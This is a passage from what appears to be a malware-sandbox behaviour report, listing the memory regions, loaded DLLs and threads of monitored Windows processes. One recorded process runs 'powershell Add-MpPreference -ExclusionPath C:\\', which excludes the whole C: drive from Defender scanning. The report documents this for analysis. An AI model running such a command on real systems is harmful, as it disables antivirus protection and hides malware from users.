entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2029 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2030 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2031 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2032 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2033 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2034 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2035 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2036 start_va = 0x7ff858070000 end_va = 0x7ff858105fff monitored = 0 entry_point = 0x7ff858095570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2037 start_va = 0x640000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2038 start_va = 0x20f0000 end_va = 0x2426fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2039 start_va = 0x1fa0000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 2040 start_va = 0x20e0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 2041 start_va = 0x2430000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 2044 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2045 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2046 start_va = 0x7ff85c200000 end_va = 0x7ff85c359fff monitored = 0 entry_point = 0x7ff85c2438e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2047 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2048 start_va = 0x2630000 end_va = 0x26ebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002630000" filename = "" Region: id = 2049 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2050 start_va = 0x7ff857680000 end_va = 0x7ff8576a1fff monitored = 0 entry_point = 0x7ff857681a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2051 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2052 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2053 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2054 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2055 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 2056 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2057 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2058 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2059 start_va = 0x680000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2060 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2061 start_va = 0x7ff851850000 end_va = 0x7ff851ac3fff monitored = 0 entry_point = 0x7ff8518c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2062 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2063 start_va = 0x6b0000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Thread: id = 62 os_tid = 0xfc4 Thread: id = 63 os_tid = 0xfc8 Thread: id = 65 os_tid = 0xfd0 Thread: id = 66 os_tid = 0xfd4 Thread: id = 89 os_tid = 0xcb0 Process: id = "18" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x119a9000" os_pid = "0x27c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0xfb8" cmd_line = "powershell Add-MpPreference -ExclusionPath C:\\" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2266 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2267 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2268 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2269 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2270 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2271 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2272 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2273 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2274 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2275 start_va = 0xe20000 end_va = 0xe90fff monitored = 0 entry_point = 0xe29c00 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 2276 start_va = 0xea0000 end_va = 0x4e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 2277 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2278 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2279 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2280 start_va = 0x7fff0000 end_va = 0x7df85d0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2281 start_va = 0x7df85d0d0000 end_va = 0x7ff85d0cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df85d0d0000" filename = "" Region: id = 2282 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2283 start_va = 0x7ff85d291000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff85d291000" filename = "" Region: id = 2285 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2286 start_va = 0x68240000 end_va = 0x6828ffff monitored = 0 entry_point = 0x68258180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2287 start_va = 0x682a0000 end_va = 0x68319fff monitored = 0 entry_point = 0x682b3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2288 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2289 start_va = 0x68290000 end_va = 0x68297fff monitored = 0 entry_point = 0x682917c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2308 start_va = 0x5a0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2309 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2310 start_va = 0x75ac0000 end_va = 0x75c3dfff monitored = 0 entry_point = 0x75b71b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2311 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2312 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2483 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2484 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2485 start_va = 0x75830000 end_va = 0x758aafff monitored = 0 entry_point = 0x7584e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2486 start_va = 0x74570000 end_va = 0x7462dfff monitored = 0 entry_point = 0x745a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2487 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2488 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2489 start_va = 0x75680000 end_va = 0x756c3fff monitored = 0 entry_point = 0x75699d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2490 start_va = 0x753a0000 end_va = 0x7544cfff monitored = 0 entry_point = 0x753b4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2491 start_va = 0x74490000 end_va = 0x744adfff monitored = 0 entry_point = 0x7449b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2492 start_va = 0x74480000 end_va = 0x74489fff monitored = 0 entry_point = 0x74482a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2493 start_va = 0x75580000 end_va = 0x755d7fff monitored = 0 entry_point = 0x755c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2494 start_va = 0x77660000 end_va = 0x7774afff monitored = 0 entry_point = 0x7769d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2495 start_va = 0x77480000 end_va = 0x7763cfff monitored = 0 entry_point = 0x77562a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2496 start_va = 0x749b0000 end_va = 0x74afefff monitored = 0 entry_point = 0x74a66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2497 start_va = 0x756d0000 end_va = 0x75816fff monitored = 0 entry_point = 0x756e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2498 start_va = 0x755e0000 end_va = 0x75671fff monitored = 0 entry_point = 0x75618cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2499 start_va = 0x71ec0000 end_va = 0x71f18fff monitored = 1 entry_point = 0x71ed0780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 2500 start_va = 0x71f20000 end_va = 0x71f37fff monitored = 0 entry_point = 0x71f24820 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 2501 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2503 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2504 start_va = 0x5a0000 end_va = 0x727fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 2505 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2506 start_va = 0x75c40000 end_va = 0x75c6afff monitored = 0 entry_point = 0x75c45680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2507 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2508 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2509 start_va = 0x1e0000 end_va = 0x1e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 2510 start_va = 0x860000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 2511 start_va = 0x4ea0000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ea0000" filename = "" Region: id = 2512 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2513 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2514 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2515 start_va = 0x9f0000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 2516 start_va = 0x71e40000 end_va = 0x71eb8fff monitored = 1 entry_point = 0x71e4f82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 2517 start_va = 0x74860000 end_va = 0x748a4fff monitored = 0 entry_point = 0x7487de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2518 start_va = 0x75510000 end_va = 0x7551bfff monitored = 0 entry_point = 0x75513930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2519 start_va = 0x71e30000 end_va = 0x71e37fff monitored = 0 entry_point = 0x71e317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2520 start_va = 0x71770000 end_va = 0x71e20fff monitored = 1 entry_point = 0x71785d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 2521 start_va = 0x71670000 end_va = 0x71764fff monitored = 0 entry_point = 0x716c4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 2522 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2523 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2524 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2525 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2526 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2527 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2528 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2529 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2530 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2531 start_va = 0x520000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2532 start_va = 0x9f0000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 2533 start_va = 0xae0000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 2534 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2535 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2536 start_va = 0x9f0000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 2537 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 2538 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2539 start_va = 0x62a0000 end_va = 0x829ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 2540 start_va = 0x730000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 2541 start_va = 0xa30000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 2542 start_va = 0xa80000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 2547 start_va = 0xaf0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2548 start_va = 0xb30000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 3105 start_va = 0x82a0000 end_va = 0x85d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3106 start_va = 0x70440000 end_va = 0x71667fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll") Region: id = 3108 start_va = 0xb70000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 3109 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3115 start_va = 0x6f830000 end_va = 0x701dbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll") Region: id = 3122 start_va = 0x6f110000 end_va = 0x6f821fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll") Region: id = 3130 start_va = 0x6f080000 end_va = 0x6f10afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\24c2ce3e0888a5f9c613c20443ec3711\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pb378ec07#\\24c2ce3e0888a5f9c613c20443ec3711\\microsoft.powershell.consolehost.ni.dll") Region: id = 3133 start_va = 0x6f060000 end_va = 0x6f072fff monitored = 0 entry_point = 0x6f069950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3134 start_va = 0x6f030000 end_va = 0x6f05efff monitored = 0 entry_point = 0x6f0495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3135 start_va = 0x74130000 end_va = 0x7414afff monitored = 0 entry_point = 0x74139050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3147 start_va = 0x6d780000 end_va = 0x6f02dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\1ccb63704392d146fb118a3c7c02e118\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.manaa57fc8cc#\\1ccb63704392d146fb118a3c7c02e118\\system.management.automation.ni.dll") Region: id = 3241 start_va = 0xb70000 end_va = 0xbd1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 3242 start_va = 0xc50000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 3243 start_va = 0x750000 end_va = 0x754fff monitored = 0 entry_point = 